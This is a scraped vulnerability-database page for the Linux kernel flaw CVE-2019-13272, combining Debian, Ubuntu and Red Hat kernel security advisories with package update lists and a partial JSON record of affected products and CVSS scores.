For the oldstable distribution (stretch), this problem has been fixed in version 4.9.168-1+deb9u4.

For the stable distribution (buster), this problem has been fixed in version 4.19.37-5+deb10u1. This update includes as well a patch for a regression introduced by the original fix for CVE-2019-11478 (#930904).

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl0zJkBfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0SvYw/8CJrPtf7juWLaRa3m/LvFewU+BppoJqNaVUbQNXVT90PgH/zDWVbpkJ4g Tr4MW6tzRKnAfUS+jObsnR9jGo871ZZ2wtlcM3W0bMnCwK6tPnTGiqTauflPXf2X KW8V3YLI6W6MxPlSLa2EQkDJ/RfTke4SwQDFDX0lzYjC5LwCwDwKIWBC6P5xBg6w yxNh6PHv9++ES8SKYpU3oMlWG43fJZJ8Oyy7Wdk0H84Qcjxb8FDP2iWyRf0Mvb+5 1uFosUswfN89imMrIFdYhv/z7CYFeHgYA0lPIvQ1gpNWOflrGqoMYL1Pys95mVCV RdRBtWy2atPHos6HEgw85cxaTS9Ss9FYB0sL+QCqIdw5ZwTt5+QR+JLNvJ53VKEm BxE5TncjlEAOc9t74xti/vBW2eCjp7IPaMP8X8eqWKiaMGJBlwaJEPUSmL4SiZo+ cW1plAYxc0CYq4lDWo3fcR7tBMQfp1ffDYUNn3DXvHChF1Ebi3zIdGl+oSeNP8hW OuaH6/P+qko0S/TNXAK5uaekrzjYv2pWm6xoM10fMVXiT8GiyjIGmSTTu6WvaiCA ITdy+o/jAfBiQsdFer2MYUna8QxjOy3XClKsy9+yjrj8ciekC4nOPHdz3/CYfOha cojPRl2Qd2KSWfEUoze2IqPrr3iAnKFKH6a+WU1XQZuo6r3uo0Q= =fTIm -----END PGP SIGNATURE----- . 8) - x86_64

========================================================================= Ubuntu Security Notice USN-4094-1 August 13, 2019

linux, linux-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 18.04 LTS
Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux: Linux kernel - linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems - linux-gke-4.15: Linux kernel for Google Container Engine (GKE) systems - linux-kvm: Linux kernel for cloud environments - linux-oem: Linux kernel for OEM processors - linux-oracle: Linux kernel for Oracle Cloud systems - linux-raspi2: Linux kernel for Raspberry Pi 2 - linux-snapdragon: Linux kernel for Snapdragon processors - linux-azure: Linux kernel for Microsoft Azure Cloud systems - linux-hwe: Linux hardware enablement (HWE) kernel

Details:

It was discovered that the alarmtimer implementation in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. (CVE-2018-13053)

Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly track inode validations. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13093)

Wen Xu discovered that the f2fs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious f2fs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13097, CVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616, CVE-2018-13096, CVE-2018-13098, CVE-2018-14615)

Wen Xu and Po-Ning Tseng discovered that btrfs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious btrfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613, CVE-2018-14609)

Wen Xu discovered that the HFS+ filesystem implementation in the Linux kernel did not properly handle malformed catalog data in some situations. An attacker could use this to construct a malicious HFS+ image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14617)

Vasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem of the Linux kernel did not properly initialize new files in some situations. A local attacker could use this to expose sensitive information. (CVE-2018-16862)

Hui Peng and Mathias Payer discovered that the USB subsystem in the Linux kernel did not properly handle size checks when handling an extra USB descriptor. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2018-20169)

It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-20856)

Eli Biham and Lior Neumann discovered that the Bluetooth implementation in the Linux kernel did not properly validate elliptic curve parameters during Diffie-Hellman key exchange in some situations. An attacker could use this to expose sensitive information. (CVE-2018-5383)

It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)

Andrei Vlad Lutas and Dan Lutas discovered that some x86 processors incorrectly handle SWAPGS instructions during speculative execution. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-1125)

It was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-12614)

It was discovered that a NULL pointer dereference vulnerabilty existed in the Near-field communication (NFC) implementation in the Linux kernel. An attacker could use this to cause a denial of service (system crash). (CVE-2019-12818)

It was discovered that the MDIO bus devices subsystem in the Linux kernel improperly dropped a device reference in an error condition, leading to a use-after-free. An attacker could use this to cause a denial of service (system crash). (CVE-2019-12819)

It was discovered that a NULL pointer dereference vulnerability existed in the Near-field communication (NFC) implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-12984)

Jann Horn discovered a use-after-free vulnerability in the Linux kernel when accessing LDT entries in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-13233)

Jann Horn discovered that the ptrace implementation in the Linux kernel did not properly record credentials in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. (CVE-2019-13272)

It was discovered that the Empia EM28xx DVB USB device driver implementation in the Linux kernel contained a use-after-free vulnerability when disconnecting the device. An attacker could use this to cause a denial of service (system crash). (CVE-2019-2024)

It was discovered that the USB video device class implementation in the Linux kernel did not properly validate control bits, resulting in an out of bounds buffer read. A local attacker could use this to possibly expose sensitive information (kernel memory). (CVE-2019-2101)

It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)

It was discovered that the Appletalk IP encapsulation driver in the Linux kernel did not properly prevent kernel addresses from being copied to user space. A local attacker with the CAP_NET_ADMIN capability could use this to expose sensitive information. (CVE-2018-20511)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 18.04 LTS: linux-image-4.15.0-1021-oracle 4.15.0-1021.23 linux-image-4.15.0-1040-gcp 4.15.0-1040.42 linux-image-4.15.0-1040-gke 4.15.0-1040.42 linux-image-4.15.0-1042-kvm 4.15.0-1042.42 linux-image-4.15.0-1043-raspi2 4.15.0-1043.46 linux-image-4.15.0-1050-oem 4.15.0-1050.57 linux-image-4.15.0-1060-snapdragon 4.15.0-1060.66 linux-image-4.15.0-58-generic 4.15.0-58.64 linux-image-4.15.0-58-generic-lpae 4.15.0-58.64 linux-image-4.15.0-58-lowlatency 4.15.0-58.64 linux-image-gcp 4.15.0.1040.42 linux-image-generic 4.15.0.58.60 linux-image-generic-lpae 4.15.0.58.60 linux-image-gke 4.15.0.1040.43 linux-image-gke-4.15 4.15.0.1040.43 linux-image-kvm 4.15.0.1042.42 linux-image-lowlatency 4.15.0.58.60 linux-image-oem 4.15.0.1050.54 linux-image-oracle 4.15.0.1021.24 linux-image-powerpc-e500mc 4.15.0.58.60 linux-image-powerpc-smp 4.15.0.58.60 linux-image-powerpc64-emb 4.15.0.58.60 linux-image-powerpc64-smp 4.15.0.58.60 linux-image-raspi2 4.15.0.1043.41 linux-image-snapdragon 4.15.0.1060.63 linux-image-virtual 4.15.0.58.60

Ubuntu 16.04 LTS: linux-image-4.15.0-1021-oracle 4.15.0-1021.23~16.04.1 linux-image-4.15.0-1040-gcp 4.15.0-1040.42~16.04.1 linux-image-4.15.0-1055-azure 4.15.0-1055.60 linux-image-4.15.0-58-generic 4.15.0-58.64~16.04.1 linux-image-4.15.0-58-generic-lpae 4.15.0-58.64~16.04.1 linux-image-4.15.0-58-lowlatency 4.15.0-58.64~16.04.1 linux-image-azure 4.15.0.1055.58 linux-image-gcp 4.15.0.1040.54 linux-image-generic-hwe-16.04 4.15.0.58.79 linux-image-generic-lpae-hwe-16.04 4.15.0.58.79 linux-image-gke 4.15.0.1040.54 linux-image-lowlatency-hwe-16.04 4.15.0.58.79 linux-image-oem 4.15.0.58.79 linux-image-oracle 4.15.0.1021.15 linux-image-virtual-hwe-16.04 4.15.0.58.79

After a standard system update you need to reboot your computer to make all the necessary changes.

References: https://usn.ubuntu.com/4094-1 CVE-2018-13053, CVE-2018-13093, CVE-2018-13096, CVE-2018-13097, CVE-2018-13098, CVE-2018-13099, CVE-2018-13100, CVE-2018-14609, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613, CVE-2018-14614, CVE-2018-14615, CVE-2018-14616, CVE-2018-14617, CVE-2018-16862, CVE-2018-20169, CVE-2018-20511, CVE-2018-20856, CVE-2018-5383, CVE-2019-10126, CVE-2019-1125, CVE-2019-12614, CVE-2019-12818, CVE-2019-12819, CVE-2019-12984, CVE-2019-13233, CVE-2019-13272, CVE-2019-2024, CVE-2019-2101, CVE-2019-3846

Package Information: https://launchpad.net/ubuntu/+source/linux/4.15.0-58.64 https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1040.42 https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1040.42 https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1042.42 https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1050.57 https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1021.23 https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1043.46 https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1060.66 https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1055.60 https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1040.42~16.04.1 https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-58.64~16.04.1 https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1021.23~16.04.1 . (CVE-2019-10126)

Amit Klein and Benny Pinkas discovered that the Linux kernel did not sufficiently randomize IP ID values generated for connectionless networking protocols. (CVE-2019-13272)

Update instructions:

The problem can be corrected by updating your livepatches to the following versions:

| Kernel | Version | flavors | |--------------------------+----------+--------------------------| | 4.4.0-148.174 | 54.1 | lowlatency, generic | | 4.4.0-150.176 | 54.1 | generic, lowlatency | | 4.4.0-151.178 | 54.1 | lowlatency, generic | | 4.4.0-154.181 | 54.1 | lowlatency, generic | | 4.4.0-157.185 | 54.1 | lowlatency, generic | | 4.15.0-50.54 | 54.2 | generic, lowlatency | | 4.15.0-50.54~16.04.1 | 54.2 | generic, lowlatency | | 4.15.0-51.55 | 54.2 | generic, lowlatency | | 4.15.0-51.55~16.04.1 | 54.2 | generic, lowlatency | | 4.15.0-52.56 | 54.2 | lowlatency, generic | | 4.15.0-52.56~16.04.1 | 54.2 | generic, lowlatency | | 4.15.0-54.58 | 54.2 | generic, lowlatency | | 4.15.0-54.58~16.04.1 | 54.2 | generic, lowlatency | | 4.15.0-55.60 | 54.2 | generic, lowlatency |

References: CVE-2018-1129, CVE-2019-2101, CVE-2019-3846, CVE-2019-10126, CVE-2019-12614, CVE-2019-12818, CVE-2019-12819, CVE-2019-12984, CVE-2019-13272

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel-alt security, bug fix, and enhancement update Advisory ID: RHSA-2019:2809-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2809 Issue date: 2019-09-20 CVE Names: CVE-2019-5489 CVE-2019-6974 CVE-2019-13272 ==================================================================== 1. Summary:

An update for kernel-alt is now available for Red Hat Enterprise Linux 7.

Relevant releases/architectures:

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, noarch, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, noarch, ppc64le

Description:

The kernel-alt packages provide the Linux kernel version 4.x.

Security Fix(es):

Kernel: page cache side channel attacks (CVE-2019-5489)
Kernel: KVM: potential use-after-free via kvm_ioctl_create_device() (CVE-2019-6974)
kernel: broken permission and object lifetime handling for PTRACE_TRACEME (CVE-2019-13272)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

[kernel-alt]: BUG: unable to handle kernel NULL pointer IP: crypto_remove_spawns+0x118/0x2e0 (BZ#1536967)
[HPE Apache] update ssif max_xmit_msg_size limit for multi-part messages (BZ#1610534)
RHEL-Alt-7.6 - powerpc/pseries: Fix unitialized timer reset on migration / powerpc/pseries/mobility: Extend start/stop topology update scope (LPM) (BZ#1673613)
RHEL-Alt-7.6 - s390: sha3_generic module fails and triggers panic when in FIPS mode (BZ#1673979)
RHEL-Alt-7.6 - System crashed after oom - During ICP deployment (BZ#1710304)
kernel-alt: Race condition in hashtables [rhel-alt-7.6.z] (BZ#1712127)
RHEL-Alt-7.6 - OP930:PM_Test:cpupower -r command set values for first 3 cores in quad and misses last core. (CORAL) (BZ#1717836)
RHEL-Alt-7.6 - disable runtime NUMA remapping for PRRN/LPM/VPHN (BZ#1717906)
fragmented packets timing out (BZ#1729066)
Backport TCP follow-up for small buffers (BZ#1733617)

Enhancement(s):

RHEL-Alt-7.6 - perfevent PMDA cannot create file descriptors for reading nest events using the perf API (pcp/kernel) (CORAL) (BZ#1723036)
Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

Bugs fixed (https://bugzilla.redhat.com/):

1664110 - CVE-2019-5489 Kernel: page cache side channel attacks 1671913 - CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device() 1730895 - CVE-2019-13272 kernel: broken permission and object lifetime handling for PTRACE_TRACEME

Package List:

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):

Source: kernel-alt-4.14.0-115.12.1.el7a.src.rpm

aarch64: kernel-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debug-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debug-devel-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm kernel-devel-4.14.0-115.12.1.el7a.aarch64.rpm kernel-headers-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-libs-4.14.0-115.12.1.el7a.aarch64.rpm perf-4.14.0-115.12.1.el7a.aarch64.rpm perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm python-perf-4.14.0-115.12.1.el7a.aarch64.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm

noarch: kernel-abi-whitelists-4.14.0-115.12.1.el7a.noarch.rpm kernel-doc-4.14.0-115.12.1.el7a.noarch.rpm

ppc64le: kernel-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-bootwrapper-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debug-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-devel-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-headers-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-libs-4.14.0-115.12.1.el7a.ppc64le.rpm perf-4.14.0-115.12.1.el7a.ppc64le.rpm perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm python-perf-4.14.0-115.12.1.el7a.ppc64le.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm

s390x: kernel-4.14.0-115.12.1.el7a.s390x.rpm kernel-debug-4.14.0-115.12.1.el7a.s390x.rpm kernel-debug-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm kernel-debug-devel-4.14.0-115.12.1.el7a.s390x.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm kernel-debuginfo-common-s390x-4.14.0-115.12.1.el7a.s390x.rpm kernel-devel-4.14.0-115.12.1.el7a.s390x.rpm kernel-headers-4.14.0-115.12.1.el7a.s390x.rpm kernel-kdump-4.14.0-115.12.1.el7a.s390x.rpm kernel-kdump-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm kernel-kdump-devel-4.14.0-115.12.1.el7a.s390x.rpm perf-4.14.0-115.12.1.el7a.s390x.rpm perf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm python-perf-4.14.0-115.12.1.el7a.s390x.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):

aarch64: kernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-libs-devel-4.14.0-115.12.1.el7a.aarch64.rpm perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm

noarch: kernel-doc-4.14.0-115.12.1.el7a.noarch.rpm

ppc64le: kernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debug-devel-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-libs-devel-4.14.0-115.12.1.el7a.ppc64le.rpm perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBXYS+G9zjgjWX9erEAQgWLQ/9E1IoTs6bpakJ6GIPIMJUeYDCRpXLRrHt CAdDGt7wQ2l5PUY2R98fiCs266c8Vaiqll6PDbFRDwHEI4gSkYnemdC3pdD/u1ct KEch6TBhUejC52t/Zvq2hrUItEj1oz35mVTv+cHHfX9HqVTdV+1SeOR+WoETy+I4 qdBKOSPybxtisp9fdczX0F3uzAfpHqCFVZ2OSvPJmDCZU20gjF+1h+HiyvS4iWT1 qrlMFQ1EliSMbjO/pCTj6PHIcOUNPg7tkx72s5E0qRd4Ja10nZ7QNUh8VGGHNQxb UYLfM7GojPgWx2UzjLo6EU5a9/Xuo6rwgTE5hKWGqZCm645RSv71tpTbdZJe6vnS cyzGIV7NtIvMF625LvimVBB/BSXZK3vYpSuBtcPnvKg2wAet83fIzQ4PtwBpzP7p NfFLvedXg2CRZIYbi5u6tzCqE2UKDpfvKWry8MyELDpt4b4iZEbHt0S4ZdfKzOvu ajvY2VuM414x0FZpWCEHFXT7dbcilf2ZBg0g0UgazRhumm9utfBsbmQz0fS7GcML Ef3YRj97YJPhGoeAQ8b+ox8Z+Q/J+/39smr94scd9FjhotlQgVh9zmd6c4IzisEE iwtg6J38bOHzXi9q3x3Fw4FTe6kUQHeOw9703w/EqojumKVCVCX6VoZ0tmAt720O ItDqWovzGmk=yv43 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "5.1.17"
      },
      {
        "_id": null,
        "model": "e-series performance analyzer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.71"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "_id": null,
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.58"
      },
      {
        "_id": null,
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.133"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.52"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.185"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "_id": null,
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "_id": null,
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0_s390x"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.40"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.185"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.6"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.6"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for arm 64",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0_aarch64"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.8"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.1"
      },
      {
        "_id": null,
        "model": "e-series santricity os controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "_id": null,
        "model": "e-series santricity os controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.8"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "aff a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.1.39"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.8.16"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:debian:debian_linux",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:fedoraproject:fedora",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:linux:linux_kernel",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Google Security Research, Ventsislav Varbanovski,Metasploit,nu11secur1ty,Jann Horn,bcoles",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-13272",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-13272",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
